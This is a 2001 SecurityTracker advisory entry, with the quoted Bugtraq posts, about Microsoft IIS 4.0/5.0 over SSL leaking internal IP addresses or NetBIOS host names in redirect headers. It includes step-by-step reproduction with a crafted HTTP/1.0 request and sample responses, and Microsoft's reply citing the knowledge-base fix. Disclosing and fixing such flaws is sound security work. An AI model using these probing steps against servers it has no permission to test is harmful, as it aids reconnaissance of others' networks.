SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
(Knowledge Base Article Covers This Issue) Re: Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
SecurityTracker Alert ID:  1002171
SecurityTracker URL:  http://securitytracker.com/id/1002171
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 10 2001
Impact:   Disclosure of system information
Fix Available:  Yes  
Version(s): 4.0 with SSL, 5.0 with SSL
Description:   A vulnerability was reported by e-Synergies in Microsoft's IIS web server that allows remote users to determine internal IP addresses used by the web server or internal NetBIOS host names used by the web server.

A remote user can connect to the web server using SSL (on TCP port 443) and retrieve internal IP addresses or determine the host's network node hostname.

The following steps can be followed to trigger the vulnerability:

1- Browse the web site using a normal SSL browser and find any directory (i.e., https://[targethost]/images/icon.gif).

2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of [targethost]:

GET /images HTTP/1.0

3- The result returned by the secure web server should look like this:

HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

or

HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

It is reported that using HTTP/1.1 in the request instead of HTTP/1.0 will not give the same results.

Impact:   A remote user can determine internal IP addresses used by the web server or internal NetBIOS host names used by the web server.
Solution:   There is a Knowledge Base article that covers this issue. The article reportedly contains information on how to force IIS to use the fully qualified domain name (FQDN) instead of the IP address.

The article is titled: (Q218180) Internet Information Server Returns IP Address in HTTP Header Content-Location)

The article is available at:
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180

Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 8 2001 Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users



 Source Message Contents

Subject:  RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


The checklists for securing IIS4 and IIS5 discuss this issue.
Specifically:

"Disable IP Address in Content-Location 
The Content-Location header may expose internal IP addresses that are
usually hidden or masked behind a Network Address Translation (NAT)
Firewall or proxy server. Refer to Q218180 for further information about
disabling this option."

The referenced Knowledge Base Article contains information on how to
force IIS to use the FQDN instead of the IP address.  

(Q218180) Internet Information Server Returns IP Address in HTTP Header
(Content-Location) -
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
"There is a value that can be modified in the IIS metabase to change the
default behavior from exposing IP addresses to send the FQDN instead.
This allows the IP address to be masked by the domain name."


The IIS4 checklist is available here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
utions/security/tools/iischk.asp

And the IIS5 checklist here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
utions/security/tools/iis5chk.asp

Regards,

Secure@Microsoft.com

-----Original Message-----
From: Marek Roy [mailto:marek_roy@hotmail.com] 
Sent: Tuesday, August 07, 2001 9:55 PM
To: bugtraq@securityfocus.com
Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


GGS-AU / e-Synergies Security Advisory

August 8, 2001



Internal IP Address Disclosure in Microsoft-IIS 4.0 & 

5.0



Synopsis:



e-Synergies has discovered and researched remote 

vulnerability in Internet Information Server from 

Microsoft.  Successful

exploitation of this vulnerability can reveal critical 

internal information such as Internal IP Address or 

Internal host name.



Affected Versions:



Microsoft IIS 4.0 running SSL

Microsoft IIS 5.0 running SSL



Description:



By connecting manually to port TCP/443 (SSL) using 

Perl(SSLeay) or any other tools, a remote user has 

the ability to retrieve

Internal IP address or reveal the machine's network 

node hostname.



Exploit:



1-      Browse the web site using a normal SSL 

browser and find any directory. I.E.: 

https://www.target.com/images/icon.gif



2-      Using a compatible SSL Perl script, execute the 

following command once connected to port 443 of 

www.target.com:



        GET /images HTTP/1.0



3-      The result should look like this:



        HTTP/1.1 302 Object Moved

        Location: https://192.168.1.10/images/

        Server: Microsoft-IIS/4.0

        Content-Type: text/html

        Content-Length: xxx



        or



        HTTP/1.1 302 Object Moved

        Location: https://netbiosname/images/

        Server: Microsoft-IIS/4.0

        Content-Type: text/html

        Content-Length: xxx



Remarks:



Using HTTP/1.1 instead of HTTP/1.0 will not give the 

same result.



Credits:



Marek Roy

Senior IT Security Consultant



Please send suggestions, updates, and comments to:



GGS-AU / e-synergies, Sydney, Australia 



Level 9

65 York Street

Sydney NSW 2001

Australia



Phone: +61 2 9279 2533

Fax: +61 2 9279 2544

Email: enquiries@ggs-au.com

http://www.ggs-au.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC